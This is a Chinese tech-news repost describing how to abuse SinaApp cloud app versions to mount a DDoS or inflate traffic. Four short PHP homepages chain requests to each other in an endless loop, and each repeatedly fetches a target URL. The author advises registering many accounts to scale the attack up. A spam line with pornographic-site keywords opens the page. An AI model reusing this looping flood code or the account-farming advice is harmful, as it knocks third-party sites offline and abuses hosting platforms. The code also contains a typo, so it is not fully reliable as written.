自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

黑客可利用云開發(fā)平臺進(jìn)行DDOS攻擊

安全 黑客攻防
說是DDOS攻擊,實(shí)際上還可以用來刷流量和排名。估計(jì)這個(gè)想法很多大牛之前已經(jīng)有想過,昨天在使用sinaapp時(shí)測試了下,貌似可行,所以和大家分享下。

說是DDOS攻擊,實(shí)際上還可以用來刷流量和排名。估計(jì)這個(gè)想法很多大牛之前已經(jīng)有想過,昨天在使用sinaapp時(shí)測試了下,貌似可行,所以和大家分享下。

大牛小牛應(yīng)該都知道sinaapp、百度site app等都為開發(fā)者提供了很好的開放平臺,注冊也很簡單。每個(gè)用戶可以創(chuàng)建不同版本的app應(yīng)用,攻擊者可以利用該特點(diǎn),注冊大量用戶,編寫PHP代碼對目標(biāo)發(fā)起攻擊,在測試過程中,我使用了一個(gè)帳號,創(chuàng)建了4個(gè)版本的APP進(jìn)行測試,在自己站點(diǎn)上寫了個(gè)記錄訪問者ip的文件作為被攻擊者,效果不錯,該記錄文件每秒的容量暴漲(說明app訪問被攻擊者網(wǎng)站的頻率很高)。下面看下測試步驟:

PS:主要使用sinaapp作為測試對象。

測試思路:創(chuàng)建4個(gè)版本的app.

版本1 主頁代碼如下:

  1. <?php 
  2. file_get_contents('http://2.mars.sinaapp.com/');//版本1觸發(fā)攻擊(訪問版本2)  
  3. ?> 

版本2 主頁代碼:

  1. <?php 
  2. file_get_contents('http://www.xxx.com/ip.php')://攻擊目標(biāo)  
  3. file_get_contents('http://3.mars.sinaapp.com/');//訪問版本3  
  4. ?> 

版本3 主頁代碼:

  1. <?php 
  2. for ($i=1; $<=10; $i++){//這里邪惡了一下,多來幾次效果更佳  
  3. file_get_contents('http://www.xxx.com/ip.php');  
  4. file_get_contents('http://4.mars.sinaapp.com/'); }  
  5. ?> 

版本4 主頁代碼:

  1. <?php 
  2. file_get_contents('http://2.mars.sinaapp.com/');//訪問版本2,導(dǎo)致死循環(huán)  
  3. ?> 

以上是使用一個(gè)sinaapp用戶進(jìn)行攻擊的步驟,可以自己擴(kuò)展,注冊大量用戶及創(chuàng)建更多的版本進(jìn)行攻擊。但在測試過程中發(fā)現(xiàn),每個(gè)APP實(shí)際上有兩個(gè)IP出口。使用多個(gè)用戶效果會更好。

PS:大家應(yīng)該會有個(gè)疑問,為什么要創(chuàng)建版本4,這個(gè)我也是在實(shí)驗(yàn)中發(fā)現(xiàn)的,如果使用版本2和版本3直接互調(diào),則達(dá)不到攻擊的效果,版本2和版本3只訪問被攻擊目標(biāo)一次舊停止了。有哪位大牛知道為什么的還請不惜賜教。

責(zé)任編輯:藍(lán)雨淚 來源: FreebuF
相關(guān)推薦

2016-09-19 14:23:11

2011-08-10 09:13:22

2023-06-27 08:30:48

2009-04-17 23:20:24

2015-08-21 19:01:12

2022-06-05 14:03:00

漏洞DDoS 攻擊

2012-07-23 13:15:15

2014-08-01 10:37:08

2022-02-06 12:21:27

惡意攻擊黑客谷歌

2015-03-02 11:08:02

2024-05-24 14:41:36

2018-05-23 07:03:48

2011-08-10 09:35:38

2014-01-13 09:30:20

2015-11-10 16:00:24

2010-09-16 20:45:14

2019-04-22 07:45:02

2010-10-08 09:25:55

2022-05-05 09:04:33

惡意軟件黑客

2009-01-04 09:57:24

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號